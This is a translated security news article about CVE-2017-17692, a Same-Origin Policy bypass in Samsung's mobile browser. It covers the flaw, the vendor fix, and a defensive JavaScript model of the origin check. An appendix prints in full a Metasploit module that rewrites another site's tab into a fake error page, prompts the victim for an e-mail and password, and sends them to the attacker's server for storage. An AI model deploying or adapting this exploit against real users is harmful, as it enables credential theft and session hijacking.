
Samsung mobile browser found to have a Same-Origin Policy bypass flaw, affecting 300 million devices

A serious vulnerability has been found in the browser app preinstalled on Samsung phones: if a user visits a site controlled by an attacker, the attacker can steal the user's data from other tabs of the browser. The flaw affects hundreds of millions of Samsung Android devices.

Overview

The vulnerability is tracked as CVE-2017-17692. It is a Same-Origin Policy (SOP) bypass in the widely used Samsung Internet browser, affecting versions before 5.4.02.3.

Same-Origin Policy

The Same-Origin Policy is a browser security feature used by every browser that supports JavaScript. Two pages are same-origin when their domain name, protocol and port all match. When a browser has page A open in one tab and page B in another, and a script runs in tab A, the browser checks which page the script belongs to, and only scripts from the same origin as A are run. If the origins differ, the browser reports an exception in the console when the data is requested, indicating that access was denied. In other words, the Same-Origin Policy ensures that JavaScript code from origin A cannot access the properties of a page from origin B.
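As an added illustration (not code from the article, from Samsung, or from the Rapid7 module), the following JavaScript models the check a compliant browser must perform before script in one tab may touch the document of another tab: reduce both URLs to the (scheme, host, port) triple, treating an omitted port as the scheme's default, and refuse access when any component differs. The sample URLs, including the `attacker.invalid` lure page, are constructed for the example; the point is that a browser applying this check to a tab opened with `window.open` would block exactly the DOM rewrite the article describes.

```javascript
// Added example: a minimal model of the Same-Origin Policy check.
// It is not the article's code and not the Metasploit module; it shows what
// a compliant browser must decide before cross-tab DOM access is allowed.

// Default ports per scheme, so "http://a.example/" and "http://a.example:80/"
// compare as the same origin.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ftp:': '21' };

// Reduce a URL to its origin triple: scheme, host, port.
function originOf(urlString) {
  const u = new URL(urlString);
  const port = u.port !== '' ? u.port : (DEFAULT_PORTS[u.protocol] || '');
  return { scheme: u.protocol, host: u.hostname.toLowerCase(), port };
}

// The SOP predicate from the text: same scheme, same host, same port.
function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return oa.scheme === ob.scheme && oa.host === ob.host && oa.port === ob.port;
}

// Model of the access check performed when script running in the tab at
// scriptUrl tries to read or write the document of the tab at targetUrl.
// Returns a decision object instead of throwing, so the result is easy to log
// and to test; a real browser raises a SecurityError in the denied case.
function domAccessDecision(scriptUrl, targetUrl) {
  if (sameOrigin(scriptUrl, targetUrl)) {
    return { allowed: true, reason: 'same origin' };
  }
  const oa = originOf(scriptUrl);
  const ob = originOf(targetUrl);
  const diff = [];
  if (oa.scheme !== ob.scheme) diff.push('scheme');
  if (oa.host !== ob.host) diff.push('host');
  if (oa.port !== ob.port) diff.push('port');
  return { allowed: false, reason: `SecurityError: origins differ in ${diff.join(', ')}` };
}

// Constructed samples: [script origin URL, target tab URL, expected decision].
// The first row is the article's scenario: a lure page opens the target site
// in a new tab and tries to rewrite its body.
const SAMPLES = [
  ['http://attacker.invalid/lure.html', 'http://example.com/', false],
  ['http://example.com/a', 'http://example.com:80/b', true],
  ['http://example.com/', 'https://example.com/', false],
  ['https://example.com/', 'https://www.example.com/', false],
  ['https://example.com:8443/', 'https://example.com/', false],
];

// Evaluate every sample and record whether the model agrees with the expectation.
function runSamples() {
  return SAMPLES.map(([from, to, expected]) => {
    const d = domAccessDecision(from, to);
    return { from, to, allowed: d.allowed, reason: d.reason, asExpected: d.allowed === expected };
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of runSamples()) {
    console.log(`${r.allowed ? 'ALLOW' : 'DENY '} ${r.from} -> ${r.to} (${r.reason})`);
  }
}
```

Run it with `node sop_check.js`; every row except the second is denied, and the deny reason names the component that differs, which is the information a browser's console error conveys in the situation the text describes.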

The vulnerability

Dhiraj Mishra discovered a Same-Origin Policy bypass in the Samsung Internet browser that allows a malicious website to steal data such as user passwords and cookies from other tabs. According to Rapid7's researchers, when Samsung Internet opens a new tab for a given domain through JavaScript, that JavaScript can rewrite the content of the page at will.

In other words, the JavaScript bypasses the Same-Origin Policy and runs one site's JavaScript in the context of another site. To do this, the attacker first embeds ordinary JavaScript in an arbitrary domain and gets the user to visit the attacker-controlled web page. The result is that the attacker can copy your session cookie, hijack the session, read and write webmail, and so on.

Vendor response

After Mishra reported the vulnerability to Samsung, Samsung replied that the patched app was already built into the upcoming Galaxy Note 8 and that they would push an update through the app store in October. Meanwhile, the Rapid7 team released a Metasploit Framework module exploiting the flaw, along with a video demonstrating the attack. Because the Metasploit module is public, even people without technical skills can exploit the vulnerability; the fix is to update the app to version 5.4.02.3 or later.

Appendix 1: Metasploit exploit module (github.com/rapid7/metas)

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samsung Internet Browser SOP Bypass',
        'Description' => %q(
          This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
          Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
          By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather
          credentials via a fake pop-up.
        ),
        'License' => MSF_LICENSE,
        'Author' => [
          'Dhiraj Mishra',  # Original discovery, disclosure
          'Tod Beardsley',  # Metasploit module
          'Jeffrey Martin'  # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2017-17692' ],
          [ 'URL', 'http://fr.0day.today/exploit/description/28434' ]
        ],
        'DisclosureDate' => 'Nov 08 2017',
        'Actions' => [[ 'WebServer' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction' => 'WebServer'
      )
    )

    register_options([
      OptString.new('TARGET_URL', [
        true,
        'The URL to spoof origin from.',
        'http://example.com/'
      ]),
      OptString.new('CUSTOM_HTML', [
        true,
        'HTML to display to the victim.',
        'This page has moved. Please <a href="#">click here</a> to redirect your browser.'
      ])
    ])

    register_advanced_options([
      OptString.new('CUSTOM_JS', [
        false,
        'Custom Javascript to inject as the go() function. Use the variable x to refer to the new tab.',
        ''
      ])
    ])
  end

  def run
    exploit # start http server
  end

  # JavaScript injected into the lure page; it runs after window.open() and
  # rewrites the child tab, which is exactly what the SOP should prevent.
  def evil_javascript
    return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank?
    js = <<-EOS
      setTimeout(function(){
        x.document.body.innerHTML='<h1>404 Error</h1>'+
        '<p>Oops, something went wrong.</p>';
        a=x.prompt('E-mail','');
        b=x.prompt('Password','');
        var cred=JSON.stringify({'user':a,'pass':b});
        var xmlhttp = new XMLHttpRequest;
        xmlhttp.open('POST', window.location, true);
        xmlhttp.send(cred);
      }, 3000);
    EOS
    js
  end

  def setup
    @html = <<-EOS
      <html>
      <meta charset="UTF-8">
      <head>
      <script>
      function go(){
        try {
          var x = window.open('#{datastore['TARGET_URL']}');
          #{evil_javascript}
        } catch(e) { }
      }
      </script>
      </head>
      <body onclick="go()">
      #{datastore['CUSTOM_HTML']}
      </body></html>
    EOS
  end

  def store_cred(username, password)
    credential_data = {
      origin_type: :import,
      module_fullname: self.fullname,
      filename: 'msfconsole',
      workspace_id: myworkspace_id,
      service_name: 'web_service',
      realm_value: datastore['TARGET_URL'],
      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
      private_type: :password,
      private_data: password,
      username: username
    }
    create_credential(credential_data)
  end

  # This assumes the default schema is being used.
  # If it's not that, it'll just display the collected POST data.
  # `cli` is passed in here because the listing as printed referenced it
  # without it being in scope, which would raise a NameError.
  def collect_data(cli, request)
    cred = JSON.parse(request.body)
    u = cred['user']
    p = cred['pass']
    if u.blank? || p.blank?
      print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
    else
      print_good("#{cli.peerhost}: Collected credential for #{datastore['TARGET_URL']} #{u}:#{p}")
      store_cred(u, p)
    end
  end

  def on_request_uri(cli, request)
    case request.method.downcase
    when 'get' # initial connection
      print_status("#{cli.peerhost}: Request #{request.method} #{request.uri}")
      print_status("#{cli.peerhost}: Attempting to spoof origin for #{datastore['TARGET_URL']}")
      send_response(cli, @html)
    when 'post' # must have fallen for it
      collect_data(cli, request)
    else
      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
    end
  end
end
```

This article is translated from thehackernews.com/2017/; if you reprint it, please cite the original address: 4hou.com/info/news/9535. For more content, follow "嘶吼專業版" (Pro4hou).

